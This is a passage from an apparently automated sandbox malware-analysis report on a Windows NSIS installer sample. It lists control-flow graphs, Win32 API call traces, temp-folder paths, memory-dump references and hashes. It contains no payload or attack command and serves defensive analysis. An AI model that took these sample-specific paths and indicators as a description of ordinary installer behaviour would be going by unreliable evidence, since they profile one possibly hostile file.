                                                                      • FindFirstFileA.KERNELBASE(75573410,007A0D98,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,00405AB6,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 004062FB
                                                                      • FindClose.KERNELBASE(00000000), ref: 00406307
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nso1F91.tmp, xrefs: 004062F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso1F91.tmp
                                                                      • API String ID: 2295610775-4015771626
                                                                      • Opcode ID: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
                                                                      • Instruction ID: 3919553d01c23f7351ed85dbc682ed8077fcf54d37e588a2b2de2e61cdf0a9ad
                                                                      • Opcode Fuzzy Hash: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
                                                                      • Instruction Fuzzy Hash: 14D012325451205BC75017786E0C88B7A589F963717214B36F9AAF61E0CB748C238AD8

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 185 403ba7-403bb9 186 403cfa-403d09 185->186 187 403bbf-403bc5 185->187 189 403d58-403d6d 186->189 190 403d0b-403d53 GetDlgItem * 2 call 40407b SetClassLongA call 40140b 186->190 187->186 188 403bcb-403bd4 187->188 193 403bd6-403be3 SetWindowPos 188->193 194 403be9-403bec 188->194 191 403dad-403db2 call 4040c7 189->191 192 403d6f-403d72 189->192 190->189 204 403db7-403dd2 191->204 196 403d74-403d7f call 401389 192->196 197 403da5-403da7 192->197 193->194 199 403c06-403c0c 194->199 200 403bee-403c00 ShowWindow 194->200 196->197 218 403d81-403da0 SendMessageA 196->218 197->191 203 404048 197->203 205 403c28-403c2b 199->205 206 403c0e-403c23 DestroyWindow 199->206 200->199 208 40404a-404051 203->208 214 403dd4-403dd6 call 40140b 204->214 215 403ddb-403de1 204->215 211 403c2d-403c39 SetWindowLongA 205->211 212 403c3e-403c44 205->212 209 404025-40402b 206->209 209->203 220 40402d-404033 209->220 211->208 216 403ce7-403cf5 call 4040e2 212->216 217 403c4a-403c5b GetDlgItem 212->217 214->215 221 404006-40401f DestroyWindow EndDialog 215->221 222 403de7-403df2 215->222 216->208 223 403c7a-403c7d 217->223 224 403c5d-403c74 SendMessageA IsWindowEnabled 217->224 218->208 220->203 226 404035-40403e ShowWindow 220->226 221->209 222->221 227 403df8-403e45 call 40600f call 40407b * 3 GetDlgItem 222->227 229 403c82-403c85 223->229 230 403c7f-403c80 223->230 224->203 224->223 226->203 255 403e47-403e4c 227->255 256 403e4f-403e8b ShowWindow KiUserCallbackDispatcher call 40409d EnableWindow 227->256 234 403c93-403c98 229->234 235 403c87-403c8d 229->235 233 403cb0-403cb5 call 404054 230->233 233->216 238 403cce-403ce1 SendMessageA 234->238 240 403c9a-403ca0 234->240 235->238 239 403c8f-403c91 235->239 238->216 239->233 243 403ca2-403ca8 call 40140b 240->243 244 403cb7-403cc0 call 40140b 240->244 253 403cae 243->253 244->216 252 403cc2-403ccc 244->252 252->253 253->233 255->256 259 403e90 256->259 260 403e8d-403e8e 256->260 261 403e92-403ec0 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403ec2-403ed3 SendMessageA 261->262 263 403ed5 261->263 264 403edb-403f15 call 4040b0 call 403b88 call 405fed lstrlenA call 40600f SetWindowTextA call 401389 262->264 263->264 264->204 275 403f1b-403f1d 264->275 275->204 276 403f23-403f27 275->276 277 403f46-403f5a DestroyWindow 276->277 278 403f29-403f2f 276->278 277->209 279 403f60-403f8d CreateDialogParamA 277->279 278->203 280 403f35-403f3b 278->280 279->209 282 403f93-403fea call 40407b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->282 280->204 281 403f41 280->281 281->203 282->203 287 403fec-403fff ShowWindow call 4040c7 282->287 289 404004 287->289 289->209
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BE3
                                                                      • ShowWindow.USER32(?), ref: 00403C00
                                                                      • DestroyWindow.USER32 ref: 00403C14
                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C30
                                                                      • GetDlgItem.USER32(?,?), ref: 00403C51
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C65
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403C6C
                                                                      • GetDlgItem.USER32(?,?), ref: 00403D1A
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D24
                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403D3E
                                                                      • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D8F
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E35
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403E56
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E68
                                                                      • EnableWindow.USER32(?,?), ref: 00403E83
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E99
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403EA0
                                                                      • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403EB8
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403ECB
                                                                      • lstrlenA.KERNEL32(0079F548,?,0079F548,00000000), ref: 00403EF5
                                                                      • SetWindowTextA.USER32(?,0079F548), ref: 00403F04
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404038
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3282139019-0
                                                                      • Opcode ID: 0a30aeb85d531018a1be584246925ac06f9566342ce983b6b2b6379f1775da4d
                                                                      • Instruction ID: b507ef7cb9582abf258fe264cbdb2372651992ce94f69c67437d7eaacc5d437d
                                                                      • Opcode Fuzzy Hash: 0a30aeb85d531018a1be584246925ac06f9566342ce983b6b2b6379f1775da4d
                                                                      • Instruction Fuzzy Hash: 09C1B0B1500204AFDB216F25EE85E2B7AB9EB8630AF00853EF741B11F1CB3D59529B5D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 290 40380a-403822 call 406385 293 403824-403834 call 405f4b 290->293 294 403836-403867 call 405ed4 290->294 303 40388a-4038b3 call 403acf call 405a73 293->303 299 403869-40387a call 405ed4 294->299 300 40387f-403885 lstrcatA 294->300 299->300 300->303 308 4038b9-4038be 303->308 309 40393a-403942 call 405a73 303->309 308->309 310 4038c0-4038d8 call 405ed4 308->310 315 403950-403975 LoadImageA 309->315 316 403944-40394b call 40600f 309->316 314 4038dd-4038e4 310->314 314->309 317 4038e6-4038e8 314->317 319 4039f6-4039fe call 40140b 315->319 320 403977-4039a7 RegisterClassA 315->320 316->315 321 4038f9-403905 lstrlenA 317->321 322 4038ea-4038f7 call 4059b0 317->322 331 403a00-403a03 319->331 332 403a08-403a13 call 403acf 319->332 323 403ac5 320->323 324 4039ad-4039f1 SystemParametersInfoA CreateWindowExA 320->324 329 403907-403915 lstrcmpiA 321->329 330 40392d-403935 call 405985 call 405fed 321->330 322->321 328 403ac7-403ace 323->328 324->319 329->330 335 403917-403921 GetFileAttributesA 329->335 330->309 331->328 343 403a19-403a33 ShowWindow call 406317 332->343 344 403a9c-403a9d call 4051e6 332->344 338 403923-403925 335->338 339 403927-403928 call 4059cc 335->339 338->330 338->339 339->330 351 403a35-403a3a call 406317 343->351 352 403a3f-403a51 GetClassInfoA 343->352 347 403aa2-403aa4 344->347 349 403aa6-403aac 347->349 350 403abe-403ac0 call 40140b 347->350 349->331 353 403ab2-403ab9 call 40140b 349->353 350->323 351->352 356 403a53-403a63 GetClassInfoA RegisterClassA 352->356 357 403a69-403a8c DialogBoxParamA call 40140b 352->357 353->331 356->357 361 403a91-403a9a call 40375a 357->361 361->328
                                                                      APIs
                                                                        • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                        • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                      • lstrcatA.KERNEL32(1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\sgJV11UlDP.exe",00000000), ref: 00403885
                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\unscorified,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,75573410), ref: 004038FA
                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 00403918
                                                                      • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\unscorified), ref: 00403961
                                                                        • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                      • RegisterClassA.USER32(007A26E0), ref: 0040399E
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039B6
                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039EB
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A21
                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 00403A4D
                                                                      • GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 00403A5A
                                                                      • RegisterClassA.USER32(007A26E0), ref: 00403A63
                                                                      • DialogBoxParamA.USER32(?,00000000,00403BA7,00000000), ref: 00403A82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\sgJV11UlDP.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\unscorified$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
                                                                      • API String ID: 1975747703-2206154555
                                                                      • Opcode ID: ed29314727cc808b10f8cc7e31e3080169c9493618b27ee180dd19afac0b604b
                                                                      • Instruction ID: 79248491ef2bc55f5e0c4717b820805706146ebb855d4f379394f0877404e8f0
                                                                      • Opcode Fuzzy Hash: ed29314727cc808b10f8cc7e31e3080169c9493618b27ee180dd19afac0b604b
                                                                      • Instruction Fuzzy Hash: 6C61C6B0240640BED610AF659D45F3B3A6CD785749F10813FF985B62E2DB7D9D028B2D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 364 402dc4-402e12 GetTickCount GetModuleFileNameA call 405b86 367 402e14-402e19 364->367 368 402e1e-402e4c call 405fed call 4059cc call 405fed GetFileSize 364->368 369 402ff4-402ff8 367->369 376 402e52 368->376 377 402f37-402f45 call 402d60 368->377 379 402e57-402e6e 376->379 383 402f47-402f4a 377->383 384 402f9a-402f9f 377->384 381 402e70 379->381 382 402e72-402e7b call 4031ea 379->382 381->382 390 402fa1-402fa9 call 402d60 382->390 391 402e81-402e88 382->391 386 402f4c-402f64 call 403200 call 4031ea 383->386 387 402f6e-402f98 GlobalAlloc call 403200 call 402ffb 383->387 384->369 386->384 412 402f66-402f6c 386->412 387->384 411 402fab-402fbc 387->411 390->384 395 402f04-402f08 391->395 396 402e8a-402e9e call 405b41 391->396 400 402f12-402f18 395->400 401 402f0a-402f11 call 402d60 395->401 396->400 415 402ea0-402ea7 396->415 406 402f27-402f2f 400->406 407 402f1a-402f24 call 40643c 400->407 401->400 406->379 410 402f35 406->410 407->406 410->377 416 402fc4-402fc9 411->416 417 402fbe 411->417 412->384 412->387 415->400 419 402ea9-402eb0 415->419 421 402fca-402fd0 416->421 417->416 419->400 420 402eb2-402eb9 419->420 420->400 422 402ebb-402ec2 420->422 421->421 423 402fd2-402fed SetFilePointer call 405b41 421->423 422->400 424 402ec4-402ee4 422->424 427 402ff2 423->427 424->384 426 402eea-402eee 424->426 428 402ef0-402ef4 426->428 429 402ef6-402efe 426->429 427->369 428->410 428->429 429->400 430 402f00-402f02 429->430 430->400
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402DD5
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\sgJV11UlDP.exe,00000400), ref: 00402DF1
                                                                        • Part of subcall function 00405B86: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\sgJV11UlDP.exe,80000000,00000003), ref: 00405B8A
                                                                        • Part of subcall function 00405B86: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BAC
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\sgJV11UlDP.exe,C:\Users\user\Desktop\sgJV11UlDP.exe,80000000,00000003), ref: 00402E3D
                                                                      • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00402F73
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\sgJV11UlDP.exe"$2SQ$6SQ$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\sgJV11UlDP.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                      • API String ID: 2803837635-2473592328
                                                                      • Opcode ID: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
                                                                      • Instruction ID: 59d678f17646e0847602a4e6c91a81595dbc35b8f9b1ca6258d7792959114811
                                                                      • Opcode Fuzzy Hash: 94b22126cedc31872e0daff38852294c1b287d6deb9664b33d13f09b0919ceb0
                                                                      • Instruction Fuzzy Hash: 0F510971900216AFDB109F64CE89B9E7BB8EB55355F10403BF904B62C1C7BC9E81AB5D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 431 40600f-40601a 432 40601c-40602b 431->432 433 40602d-406043 431->433 432->433 434 406234-406238 433->434 435 406049-406054 433->435 437 406066-406070 434->437 438 40623e-406248 434->438 435->434 436 40605a-406061 435->436 436->434 437->438 439 406076-40607d 437->439 440 406253-406254 438->440 441 40624a-40624e call 405fed 438->441 442 406083-4060b7 439->442 443 406227 439->443 441->440 445 4061d4-4061d7 442->445 446 4060bd-4060c7 442->446 447 406231-406233 443->447 448 406229-40622f 443->448 451 406207-40620a 445->451 452 4061d9-4061dc 445->452 449 4060e1 446->449 450 4060c9-4060cd 446->450 447->434 448->434 458 4060e8-4060ef 449->458 450->449 455 4060cf-4060d3 450->455 453 406218-406225 lstrlenA 451->453 454 40620c-406213 call 40600f 451->454 456 4061ec-4061f8 call 405fed 452->456 457 4061de-4061ea call 405f4b 452->457 453->434 454->453 455->449 460 4060d5-4060d9 455->460 469 4061fd-406203 456->469 457->469 462 4060f1-4060f3 458->462 463 4060f4-4060f6 458->463 460->449 465 4060db-4060df 460->465 462->463 467 4060f8-40611b call 405ed4 463->467 468 40612f-406132 463->468 465->458 480 406121-40612a call 40600f 467->480 481 4061bb-4061bf 467->481 470 406142-406145 468->470 471 406134-406140 GetSystemDirectoryA 468->471 469->453 473 406205 469->473 475 4061b2-4061b4 470->475 476 406147-406155 GetWindowsDirectoryA 470->476 474 4061b6-4061b9 471->474 478 4061cc-4061d2 call 406257 473->478 474->478 474->481 475->474 479 406157-406161 475->479 476->475 478->453 486 406163-406166 479->486 487 40617b-406191 SHGetSpecialFolderLocation 479->487 480->474 481->478 484 4061c1-4061c7 lstrcatA 481->484 484->478 486->487 489 406168-40616f 486->489 490 406193-4061ad SHGetPathFromIDListA CoTaskMemFree 487->490 491 4061af 487->491 492 406177-406179 489->492 490->474 490->491 491->475 492->474 492->487
                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040613A
                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000), ref: 0040614D
                                                                      • SHGetSpecialFolderLocation.SHELL32(0040514C,755723A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000), ref: 00406189
                                                                      • SHGetPathFromIDListA.SHELL32(755723A0,Call), ref: 00406197
                                                                      • CoTaskMemFree.OLE32(755723A0), ref: 004061A3
                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061C7
                                                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,0040514C,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00000000,00798F00,755723A0), ref: 00406219
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 717251189-3704155844
                                                                      • Opcode ID: 0051370bde1f20c27e8a119ac75029747f87839255994d0d480becf8ae13498a
                                                                      • Instruction ID: d98bd44868bde6ace230f91b8fcf6596fc401970515ead307cdfb18f28ae641c
                                                                      • Opcode Fuzzy Hash: 0051370bde1f20c27e8a119ac75029747f87839255994d0d480becf8ae13498a
                                                                      • Instruction Fuzzy Hash: EE61F471904111AEDF11AF68CC84B7E3BA49B56314F16817FE903BA2D2C73C49A2CB4E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 562 401759-40177c call 402b2c call 4059f2 567 401786-401798 call 405fed call 405985 lstrcatA 562->567 568 40177e-401784 call 405fed 562->568 574 40179d-4017a3 call 406257 567->574 568->574 578 4017a8-4017ac 574->578 579 4017ae-4017b8 call 4062f0 578->579 580 4017df-4017e2 578->580 588 4017ca-4017dc 579->588 589 4017ba-4017c8 CompareFileTime 579->589 582 4017e4-4017e5 call 405b61 580->582 583 4017ea-401806 call 405b86 580->583 582->583 590 401808-40180b 583->590 591 40187e-4018a7 call 405114 call 402ffb 583->591 588->580 589->588 592 401860-40186a call 405114 590->592 593 40180d-40184f call 405fed * 2 call 40600f call 405fed call 405709 590->593 605 4018a9-4018ad 591->605 606 4018af-4018bb SetFileTime 591->606 603 401873-401879 592->603 593->578 627 401855-401856 593->627 607 4029c1 603->607 605->606 609 4018c1-4018cc CloseHandle 605->609 606->609 611 4029c3-4029c7 607->611 612 4018d2-4018d5 609->612 613 4029b8-4029bb 609->613 615 4018d7-4018e8 call 40600f lstrcatA 612->615 616 4018ea-4018ed call 40600f 612->616 613->607 621 4018f2-402349 615->621 616->621 625 40234e-402353 621->625 626 402349 call 405709 621->626 625->611 626->625 627->603 628 401858-401859 627->628 628->592
                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens,00000000,00000000,00000031), ref: 00401798
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens,00000000,00000000,00000031), ref: 004017C2
                                                                        • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,Desalinates Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                        • Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                        • Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,00000000,00798F00,755723A0), ref: 00405170
                                                                        • Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll), ref: 00405182
                                                                        • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
